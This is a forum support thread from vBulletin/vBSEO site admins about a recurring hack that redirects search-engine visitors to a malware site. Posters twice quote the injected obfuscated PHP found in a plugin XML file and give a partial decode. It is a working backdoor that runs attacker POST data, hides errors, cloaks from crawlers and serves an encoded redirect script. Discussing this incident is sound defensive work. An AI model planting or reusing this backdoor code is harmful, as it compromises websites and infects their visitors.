Security issue

I was being sarcastic, telling me to change all the passwords I can is useless. Already have those .htaccess files in place and no malicious files found. I have always kept vbseo up-to-date and never had an issue till i updated to vb 4.0.2 and vbseo 3.5 rc2 final. Replacing all the vbseo files and re-installing the product points to there possibly being a bad file in what I downloaded before doesn't it? So if it comes back maybe it's an issue with vb 4.02 (and yes i've updated to patch level 1 now).

These aren't cached pages on the browser side, as we have made a point of clearing the caches, it is also very noticeable on satellites,.co.uk, that the number of guests viewing drops from 1000 or more to half that number whilst the re-direct is being applied.

Just tested again and it appears to have stopped doing it, I haven't touched anything.

We are a few steps further now. First to say, we have checked all directories writable to the webserver and found no scripts (.php etc.) inside. Fortunatelly, one of my lovely admins made a backup of the product.xml before we upgraded to the latest vBSEO version.

So in line 597 of the infected product-crawlability-vbseo.xml file we found:

Code:

eval(base64_decode('JHg9bWQ1KCc5aDdyJyk7aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpOw0KaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLDApO2luaV9zZXQoJ2xvZ19lcnJvcnMnLDApOw0KJHI9IWVtcHR5KCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSkgPyAkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10gOiBnZXRlbnYoJ0hUVFBfUkVGRVJFUicpOw0KaWYoc3RybGVuKCRyKT4xMCkNCnsNCgkkaXA9JF9TRVJWRVJbJ1JFTU9URV9BRERSJ107JGhuPUBnZXRob3N0YnlhZGRyKCRpcCk7DQoJaWYoKHN0cnBvcygkaXAsJzY1LjU1LicpIT09MCkmJihzdHJwb3MoJGhuLCdtc25ib3QnKT09PWZhbHNlKSkNCgl7DQoJCSRzPWFycmF5KCdzZWFyY2gubGl2ZS5jb20nLCd3d3cuZ29vZ2xlJywnc2VhcmNoLnlhaG9vLmNvbScsJ3d3dy5iaW5nLmNvbScsJ3lhbmRleC5ydScsJ2JhaWR1LmNvbScpOw0KCQlmb3JlYWNoKCRzIGFzICRlKQ0KCQl7DQoJCQlpZigoc3RycG9zKCRyLCRlKSE9PWZhbHNlKSYmKGVtcHR5KCRfQ09PS0lFWyd2YnNwJ10pKSkNCgkJCXsNCgkJCQkkaD1zdWJzdHIoQG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLDAsOCk7DQoJCQkJZGllKCI8aHRtbD48aGVhZD48L2hlYWQ+PGJvZHk+PHNjcmlwdCB0eXBlPVwidGV4dC9qYXZhc2NyaXB0XCI+dmFyIHZic3A9JyRoJzsiLnN0cl9yZXBsYWNlKCdcXCcsJ1xcXFwnLGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCdYVkpyYzlvd0VQd3JMak1kU1dPSDhEUkpYRGVUQUduVGQ1TitzOVNPRUFJY3dEakdnQlBrLzk0VktaNU1iWjl2dGJkN2R4K2t0M0pCSjUNCnRFNWZFcW9ha25QZVhOUGUyTjJWNkhGYS9ZUHRQNUpnTjZKeThKdWRBMGxkbGEzeVk1VmFlU01lWlNxa0wxVnJMMzdlN2xmWjdGeWJRK3lWDQpiTC9reG0vZFZZVStXMnp0bUZxdWVybHlwdCs0eVZRVHloYndpcFp6cGRTS1hwNmU5VDc2WE8ySDQzaXhjd25weXcvVGdDWUNLY1Iwb1lZMw0KRTVENk5xUDMzY3o0RlFsQ0o0dGZ1eFJQak9KV1dnd21ZWnZPcU1CV3hUdGsvRHRGb2owVHZuVGsrSFJVb0pIeEhYRG5RdDhzaVVNTzlnS00NCnQvSTlPU2tya2p3NmpHZDF6ekVWOXd4YmRjMTd3YW4vMVBGSHdENnBZL2dKb0N6ZmpTMGlNKzVwLzRaeWcvQWs5UlhQR2RMYVFvalBrSEVBDQpmNzh0ampnVDlDbVBBbG4xanFtZy9RNnNIQ0cvdDdoaWs5U0JUUXlsSUpEaVA0N3ZrRTd5OE1lZWJmWVVvZ21LTHk0ekIwaU5Pa0pvS2ZUaw0KYXZ2Q2Uybnp0eCtOWDVSbGtRUnpKcUNrRnRiaUF6dDgrQ3ViTU9aZFFTcm1YYmxnMXlvSTRRNFpVcm82NXduOXcxZ0MvS0lLTXk2Z2xQUm0NCmZpUlhVT2xZeStDUGN1SUY3WHR4OHgxZk9uVWFpV0wwM1I2NWpDUDBmY0lMcW1hQ0gzV29pMjFYUW1VaGRROUJwbUt6TlRkSUhiQXlqUEVFDQpORUc5RTBjVHBTcXRKM3pYaWxOa3VkNUdqWGdNQWFlakJlVnhKcjYxY25PODQzWjM2bllSK1VRUGcrREUza2EweUZ2SWVKSFRUcERFeXpZWA0KQ0h6RURtR2hwb1cwTnp2SkZtTzFxbllLL2c2Skw2T2wzRU9TVUc5NnJoN1V2Ry9nSScpKSkuIjwvc2NyaXB0PjwvYm9keT48L2h0bWw+Iik7DQoJCQl9DQoJCX0NCgl9IA0KfQ'));]]>

We got this a little bit confusing code partially decoded, so that one can understand how it works.

Code:

$x=md5('9h7r');if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));
ini_set('display_errors',0);ini_set('log_errors',0);
$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
if(strlen($r)>10)
{
    $ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);
    if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false))
    {
        $s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
        foreach($s as $e)
        {
            if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp'])))
            {
                $h=substr(@md5($_SERVER['HTTP_HOST']),0,8);
                die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVJrc9owEPwrLjMdSWOH8DRJXDeTAGnTd5N+s9SOEAIcwDjGgBPk/94VKZ5MbZ9vtbd7dx+kt3JBJ5
tE5fEqoaknPeXNPe2N2V6HFa/YPtP5JgN6Jy8JudA0ldla3yY5VaeSMeZSqkL1VrL37e7lfZ7FybQ+yV
bL/kxm/dVYU+W2ztmFquerlypt+4yVQTyhbwipZzpdSKXp6e9T76XO2H43ixcwnpyw/TgCYCKcR0oYY3
E5D6NqP33cz4FQlCJ4tfuxRPjOJWWgwmYZvOqMBWxTtk/DtFoj0TvnTk+HRUoJHxHXDnQt8siUMO9gKM
t/I9OSkrkjw6jGd1zzEV9wxbdc17wan/1PFHwD6pY/gJoCzfjS0iM+5p/4Zyg/Ak9RXPGdLaQojPkHEA
f78tjjgT9CmPAln1jqmg/Q6sHCG/t7hik9SBTQylIJDiP47vkE7y8MeebfYUogmKLy4zB0iNOkJoKfTk
avvCe2nztx+NX5RlkQRzJqCkFtbiAzt8+CubMOZdQSrmXblg1yoI4Q4ZUro65wn9w1gC/KIKMy6glPRm
fiRXUOlYy+CPcuIF7Xtx8x1fOnUaiWL03R65jCP0fcILqmaCH3Woi21XQmUhdQ9BpmKzNTdIHbAyjPEE
NEG9E0cTpSqtJ3zXilNkud5GjXgMAaejBeVxJr61cnO843Z36nYR+UQPg+DE3ka0yFvIeJHTTpDEyzYX
CHzEDmGhpoW0NzvJFmO1qnYK/g6JL6Ol3EOSUG96rh7UvG/gI')))."</script></body></html>");
            }
        }
    }

Unfortunatelly the thrilling part of the code is zipped and we have not the tools to get this decompressed. But I am sure that there is one qualified unix-proofed guy out there who gets that job done

Without logs and a 100% confidence case that it was exploited THROUGH vbseo, not just getting added into the vbseo product, its hard to say there's an epxploit in our software.

There are known vb4 exploits out there that are still un patched.

ie,
vBulletin 4.0.1 Remote SQL Injection | FUSecurity

and once they have a password, it's fair game.

Originally Posted by Lagaf

We are a few steps further now. First to say, we have checked all directories writable to the webserver and found no scripts (.php etc.) inside. Fortunatelly, one of my lovely admins made a backup of the product.xml before we upgraded to the latest vBSEO version.

So in line 597 of the infected product-crawlability-vbseo.xml file we found:

Code:

eval(base64_decode('JHg9bWQ1KCc5aDdyJyk7aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpOw0KaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLDApO2luaV9zZXQoJ2xvZ19lcnJvcnMnLDApOw0KJHI9IWVtcHR5KCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSkgPyAkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10gOiBnZXRlbnYoJ0hUVFBfUkVGRVJFUicpOw0KaWYoc3RybGVuKCRyKT4xMCkNCnsNCgkkaXA9JF9TRVJWRVJbJ1JFTU9URV9BRERSJ107JGhuPUBnZXRob3N0YnlhZGRyKCRpcCk7DQoJaWYoKHN0cnBvcygkaXAsJzY1LjU1LicpIT09MCkmJihzdHJwb3MoJGhuLCdtc25ib3QnKT09PWZhbHNlKSkNCgl7DQoJCSRzPWFycmF5KCdzZWFyY2gubGl2ZS5jb20nLCd3d3cuZ29vZ2xlJywnc2VhcmNoLnlhaG9vLmNvbScsJ3d3dy5iaW5nLmNvbScsJ3lhbmRleC5ydScsJ2JhaWR1LmNvbScpOw0KCQlmb3JlYWNoKCRzIGFzICRlKQ0KCQl7DQoJCQlpZigoc3RycG9zKCRyLCRlKSE9PWZhbHNlKSYmKGVtcHR5KCRfQ09PS0lFWyd2YnNwJ10pKSkNCgkJCXsNCgkJCQkkaD1zdWJzdHIoQG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLDAsOCk7DQoJCQkJZGllKCI8aHRtbD48aGVhZD48L2hlYWQ+PGJvZHk+PHNjcmlwdCB0eXBlPVwidGV4dC9qYXZhc2NyaXB0XCI+dmFyIHZic3A9JyRoJzsiLnN0cl9yZXBsYWNlKCdcXCcsJ1xcXFwnLGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCdYVkpyYzlvd0VQd3JMak1kU1dPSDhEUkpYRGVUQUduVGQ1TitzOVNPRUFJY3dEakdnQlBrLzk0VktaNU1iWjl2dGJkN2R4K2t0M0pCSjUNCnRFNWZFcW9ha25QZVhOUGUyTjJWNkhGYS9ZUHRQNUpnTjZKeThKdWRBMGxkbGEzeVk1VmFlU01lWlNxa0wxVnJMMzdlN2xmWjdGeWJRK3lWDQpiTC9reG0vZFZZVStXMnp0bUZxdWVybHlwdCs0eVZRVHloYndpcFp6cGRTS1hwNmU5VDc2WE8ySDQzaXhjd25weXcvVGdDWUNLY1Iwb1lZMw0KRTVENk5xUDMzY3o0RlFsQ0o0dGZ1eFJQak9KV1dnd21ZWnZPcU1CV3hUdGsvRHRGb2owVHZuVGsrSFJVb0pIeEhYRG5RdDhzaVVNTzlnS00NCnQvSTlPU2tya2p3NmpHZDF6ekVWOXd4YmRjMTd3YW4vMVBGSHdENnBZL2dKb0N6ZmpTMGlNKzVwLzRaeWcvQWs5UlhQR2RMYVFvalBrSEVBDQpmNzh0ampnVDlDbVBBbG4xanFtZy9RNnNIQ0cvdDdoaWs5U0JUUXlsSUpEaVA0N3ZrRTd5OE1lZWJmWVVvZ21LTHk0ekIwaU5Pa0pvS2ZUaw0KYXZ2Q2Uybnp0eCtOWDVSbGtRUnpKcUNrRnRiaUF6dDgrQ3ViTU9aZFFTcm1YYmxnMXlvSTRRNFpVcm82NXduOXcxZ0MvS0lLTXk2Z2xQUm0NCmZpUlhVT2xZeStDUGN1SUY3WHR4OHgxZk9uVWFpV0wwM1I2NWpDUDBmY0lMcW1hQ0gzV29pMjFYUW1VaGRROUJwbUt6TlRkSUhiQXlqUEVFDQpORUc5RTBjVHBTcXRKM3pYaWxOa3VkNUdqWGdNQWFlakJlVnhKcjYxY25PODQzWjM2bllSK1VRUGcrREUza2EweUZ2SWVKSFRUcERFeXpZWA0KQ0h6RURtR2hwb1cwTnp2SkZtTzFxbllLL2c2Skw2T2wzRU9TVUc5NnJoN1V2Ry9nSScpKSkuIjwvc2NyaXB0PjwvYm9keT48L2h0bWw+Iik7DQoJCQl9DQoJCX0NCgl9IA0KfQ'));]]>

We got this a little bit confusing code partially decoded, so that one can understand how it works.

We got hit as well, running VBSEO 3.3.2. Same as you, no file modifications found.

Found the Base64 encoded line in my vBSEO Global Start plugin and the XML file.

Can you find any log files? So far no one has been able to supply us log files.

Same problem for me! Likes to help you with the log files, but don´t know how to find them. Need help for this problem because everytime I reinstall vbseo the problem is away - but comes again after a few days!

You will need to sift through your access_log file in your apache directory and find the entries that point to an upload/etc of the round file/code. knowing the exact time it happened will help narrow it down.

Guys this really sucks, seems like a lot of big forums are affected, including ours. We are going to install 3.5 , even it is RC2, but what choice do I have? Love vbseo for many many years, but this is a killer, youneed to get it fixed. We have all security holes patched and our sysadmins changed all password you can imagine. The weakest ling is now VBSEO, at least it would be professional to admit that, all these forums cannot have that bad security of security, someone is tealing 50.000 unique incoming links from me on a daily basis. Hope this 3.5 fixes the issue otherwise we can only close our vbseo panel until a rela patch is released. Let m eknow if you think I'm wrong, but for the 5 past days I have been re hijacked again and again.

Mimezine

Hello ,

Both Brian and I explained several times that vBSEO doesn't have any security hole. If you have logs that can proof othewise , please create a support ticket and supply us the logs.

We have the same issue, for the past 2 weeks any incoming requests from search engines are being redirected to filestore73.com ! If i go in to plugin manager in vbulletin admin area and disable then re-enable the vbseo mod the problem will clear but only for 24 hours until the hackers re-enablke the redirect again. When the hackers re-direct is active to filestore73.com this is costing us over 50% of our online users plus the filestore73.com page that my users are redirected to contains a virus.

I have spoken to my web host who confirms all security on our dedicated server is up to date, he's changed all our passwords, all our forum software including vbseo is up to date yet we are still getting this problem and I'm sure vbseo think we are making this problem up.

I have provided server log access and full login details for my site to vbseo but we still have the same problem after 2 weeks and if I turn off VBSEO the problem clears, so must be an issue with VBSEO somewhere.

Like minzine says we need a fix for this ASAP otherwise we will have no sites left at this rate.

Chris.

I would like to point out that I have seen this as well. Here is what is happening. Somehow they hack is editing the datastore to include the redirect on the search engines. Once you un-enable and re-enable the datastore is rebuilt so it removes the bad code. If you were to disable another product, and enable it, you will see the same thing. I are still investigating how they are getting in and adjusting the datastore.

I believe we've experienced the same thing although I must admit I'm struggling in this case to locate where the code was even injected into. Running vB 3.8.4 PL2 with VBSEO 3.3.2.

I cycled a product in order to flush the datastore but am well aware that won't close the hole, wherever it lies.

Is there anything I can contribute to assist with finding out exactly what the root cause may be?

Originally Posted by stevekerrison

I believe we've experienced the same thing although I must admit I'm struggling in this case to locate where the code was even injected into. Running vB 3.8.4 PL2 with VBSEO 3.3.2.

I cycled a product in order to flush the datastore but am well aware that won't close the hole, wherever it lies.

Is there anything I can contribute to assist with finding out exactly what the root cause may be?

Hello ,

I don't see a vBSEO license assigned to your username. Please supply me your payment transaction id and forum url via PM.

Originally Posted by wkdchris

We have the same issue, for the past 2 weeks any incoming requests from search engines are being redirected to filestore73.com ! If i go in to plugin manager in vbulletin admin area and disable then re-enable the vbseo mod the problem will clear but only for 24 hours until the hackers re-enablke the redirect again. When the hackers re-direct is active to filestore73.com this is costing us over 50% of our online users plus the filestore73.com page that my users are redirected to contains a virus.

I have spoken to my web host who confirms all security on our dedicated server is up to date, he's changed all our passwords, all our forum software including vbseo is up to date yet we are still getting this problem and I'm sure vbseo think we are making this problem up.

I have provided server log access and full login details for my site to vbseo but we still have the same problem after 2 weeks and if I turn off VBSEO the problem clears, so must be an issue with VBSEO somewhere.

Like minzine says we need a fix for this ASAP otherwise we will have no sites left at this rate.

Chris.

Hello Chris ,

The redirect code you mentioned is located inside vBulletin plugins. This doesn't mean that vBSEO have a security hole. This code can be injected with various different methods and more likely this can be injected if there is a security hole within any modification you are using or any suspicious product file you imported to your forum. This code can also be injected if vBulletin have any security hole. Therefor we can't do anything if there will be additional logs supplied. Until now there is not a single log that shows the hole is located within vBSEO.

I advise everyone who is facing this issue to post all modification list you are using , which may help to identify the issue.